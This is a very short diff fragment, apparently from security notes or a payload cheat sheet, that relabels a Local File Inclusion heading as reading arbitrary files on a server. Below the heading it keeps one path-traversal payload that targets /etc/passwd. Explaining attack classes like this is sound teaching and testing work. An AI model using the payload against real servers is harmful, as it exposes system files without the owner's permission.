 File Inclusion

-# Local File Inclusion (LFI)
+# Local File Inclusion (LFI) — read arbitrary files on the server

 ?page=../../../../etc/passwd